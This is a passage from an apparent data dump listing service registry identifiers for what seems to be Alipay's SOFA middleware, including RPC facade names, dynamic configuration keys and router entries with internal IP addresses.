E_ID#@#SOFA","config:com.alipay.mfinquotationprod.common.service.facade.api.FundQuotationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.84.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchcommons.thunderbird.facade.MessageDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.meta2:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antlescenter.common.service.facade.api.SignService:1.0:esign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.malgo.common.facade.ItemBaseManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.merchantdata.facade.MobilecashierErrorCodeDetailFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.RuleCheckTenantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.159.152#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.67.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbitemprod.common.service.facade.item.KbStockInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcoop.common.service.facade.AssetInteractManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.tag.TagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatacontextTBaseCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.miniselfop.facade.api.miniplan.MiniPolicyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.MobileFixedFundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pfunddts.common.facade.api.ZdalProxyQueryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.admin.OrpcConfigAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:infraform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sdaxconnectplatform.common.service.facade.device.XpDeviceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.experience.ExperienceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fcdatamerge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.RuleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.operationrecord.OperationRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.145.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.opinioncore:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilewealth.common.service.facade.api.UniformProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestRZTBaseCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappcommon.common.service.facade.openapi.metadata.MetadataOpenFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:incubatorweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.alm.service.facade.facade.AccountManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ecsportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.apply.ApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iWFBizProdCommonCacheTBaseCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.243.225#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmSlaDynamicDecisionTrigger.openCardBindedExceedCheckStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.overseamng.common.service.facade.CertifiedMerchantInfoImportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clive.common.service.facade.api.ScheduleNotifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.trade.service.PurchaseDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.BPInstanceQueryFacade:1.0:fcprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.hotevent.HotEventRelatedContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.alipayauth.AlipayAuthUserCompanyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.account.MerchantAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.64.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.prodswitch.common.service.facade.UnifiedSpecialProductService:1.0:bizfund@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:publicDomain_zmcie@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_findefencecore_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iopencore.common.service.facade.scenario.ScenarioManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zbdm.common.service.facade.ZbdmMetaImportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.customServiceGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instopen.service.facade.InstScenarioFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imatchfacade.common.service.facade.adgroup.AdgroupServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmRiskAssessmentConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.NfcSpiServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imif.common.service.facade.api.MerchantShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgcore.common.service.facade.index.IndexConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkinstportal.common.service.facade.robot.api.RobotBizInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.asbi.AsbiWorkbenchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.securitycore.common.service.view.policy.drm.resource.VelocityCacheSwitchConfigureResource.cacheSwitchStatus,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.106.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cfdmp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auditprod.common.service.facade.fund.api.OuterCheckQueryFacade:1.0:auditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergwlite.service.facade.spi.MessageReceiveService:1.0:ifccardcenter_restapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.eindustrycenter.common.service.facade.EindustryApplyFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.risk.RiskDefenseControlFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.pcardAgentPurchaseAccounts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dchainconfigcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:undefined@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.164.151.153#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.mma.facade.api.dingtalk.DingtalkProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.channelrouter.service.facade.LdcDBWriteProxyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.serverless.test.facade.SofaRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:paylink@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.2.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.icardcenter.service.facade.api.query.ValidateBindingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.chargeGzoneTBaseCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsCrowdManager.solutionMatchRouteScenes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:ropcn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:imasp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbreconcenter.common.service.facade.api.CustomizeBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.idatacontextTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.TaskLevelService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.unknownMaxLoadNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rcdmncore.common.service.facade.api.ArchiveQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.admin.api.AdminOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.117.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.zcache.tbase.zprodqueryTairCacheCZone_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.irecon2.common.service.facade.api.ReverseTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.ConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recmixer.common.service.facade.CategoryRecProviderService:1.0:uioservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.ZdatabusClientTairRetryDRM.openDataTraceRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache_dest.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.etetestcore:name=com.alipay.kmi.client.cache.refresher.certName,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.mydds.dataoceanDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sandbox.common.service.facade.shadow.ShadowUserInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_RPC_TRANSMIT_LIFEMSGPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.infosectask:name=com.alipay.holoxlib.core.backtrack.drm.BacktrackConfigResource.slsConsumeWindowGuardConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:ivytwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditrmp.facade.taskmanage.TaskMonitorManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.ptcore.common.service.facade.api.ptcgt.PtCgtRelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditquery.common.api.ConsumeReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.biz.dataview.spi.MerchantEnterInfoSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:zmcpcsmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_FCTCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.nodejs.ConsumerService:1.0:thortwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.53.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ebppgw.facade.QueryBalanceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.170.244#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinsnsprod.service.facade.api.forumactivity.ForumActivityQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.v3.service.facade.api.blacklist.SpecialBlacklistFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_ENT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.poscore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.opinioncoreCacheName.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradecenter.common.service.facade.allowance.facade.AllowanceDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=midas.client.MidasClientStabilityDRMControl.featureDiscoverThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditmarket.content.service.PcreditContentQueryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.insttrade.insttrade_ds.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.airbops:name=com.alipay.amspm.ardd.common.drm.resource.AppGrayStatusResource.currentMachineGrayStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_F_IACCTRANS_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.basementweb.PullRequestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipromofront.common.service.facade.service.rpc.PrizeAwardInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.StaticResourceReportConfigSwitch.enabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:promokernel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-PCBENEFITCORE-DAILY-TASK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_F_ICARDCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cscheck.service.facade.api.GqcTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gotone.common.service.api.SendDingDingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.dpcscgateway.common.service.facade.EndpointServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antchaos.facade.api.ChaosRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_CREDITUT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_ST_CE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.artisan.extend.enhanceservice.api.ServiceEnhancerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.framodel.core.service.facade.api.FramodelPaiTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskdatacenter.service.facade.quota.RdataQuotaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.33.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.personalprod.service.facade.relation.RelationInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aggrbillinfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.limitcum.service.facade.CumulateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_ANTACP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkmportal.service.loan.api.PayLimitGuideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopUpdateConflictValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.order.facade.ShopOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincontract.common.service.facade.standard.ContractSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.amspm.insurance.service.repository.BizIdentityConfigPushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksupplychainprod_arSignProcessFinishCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:functionTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.securitycore.common.service.facade.riskrank.CustomerRiskRankRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insmarketingprod.common.service.facade.mng.offlineservice.InsMktProdOfflineServiceCouponFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-fundapplication-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:msfluxconf@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cicada.common.service.facade.api.dynamicview.ViewPackageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchiswisdom.report.common.service.facade.api.outline.OutlineReportQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.poscoreTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rinsight.common.base.service.facade.IndicatorCalculateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:antlegalchain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.mortgage.facade.DisposeInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.marketing.LoanApplyMarketingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue14#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyActions,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.saveMsgUseDistributedLock,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minitrans.service.facade.tmallpcard.api.TmallPCardtransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.196#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finassistantcore.common.service.facade.schema.api.SchemaCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.pamir.operator.PamRoleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:imet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.176.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insdataprod:name=com.alipay.dwebupload.client.drm.DomainConfig.httpsDownloadDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.126.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.110.66#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundselling.share.query.TransactionOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bketencop.facade.api.BaseDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanbenefit.common.service.facade.benefit.BenefitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ifcidentitycloudus:name=com.antcloud.ifcidentitycloudus.common.util.mic.PubResouceHolder.lisaIdentityMockKybKycConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_F_ASSET#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.tradeexprod.common.service.facade.MobileCashierChannelService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.paycheckerCZTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.definfinance.facade.loan.api.LoanTransService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.comprehensive.finpwm.FinpwmCfgDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.anteye.blkmirror.ExplorerDataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.requiremng:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdiscountprod.common.service.facade.template.api.MerchantTemplateSkuManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.scene.ServerlessLogicClusterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.appclient.process.ProcessDefinitionAccessor:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscvprod.common.service.facade.InsAttachmentRecognizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.facade.ArOperateServiceFacade:1.0:zhiMaArOperateServiceFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.sub01:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexchange.service.facade.api.query.ExchangeRateQueryPreCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.selectcore.common.service.facade.api.ContentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.spis.EntityDiagnosisService:1.0:thp_trunkAppsDiagnosisService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofabootdemo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.fraudmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openauth.common.service.facade.rpc.ResAuthQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.134.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.dt.dataphin.datasecurity.common.report.ReportSqlService:1.0:datasecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue6#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_M_MSGBENCHMARK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilesearch.biz.rpc.service.TranslateHybridFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.dal.drm.FixedDataSyncDrmImpl.switchErrorDegrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkjusticecore_deduction_finalResultCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore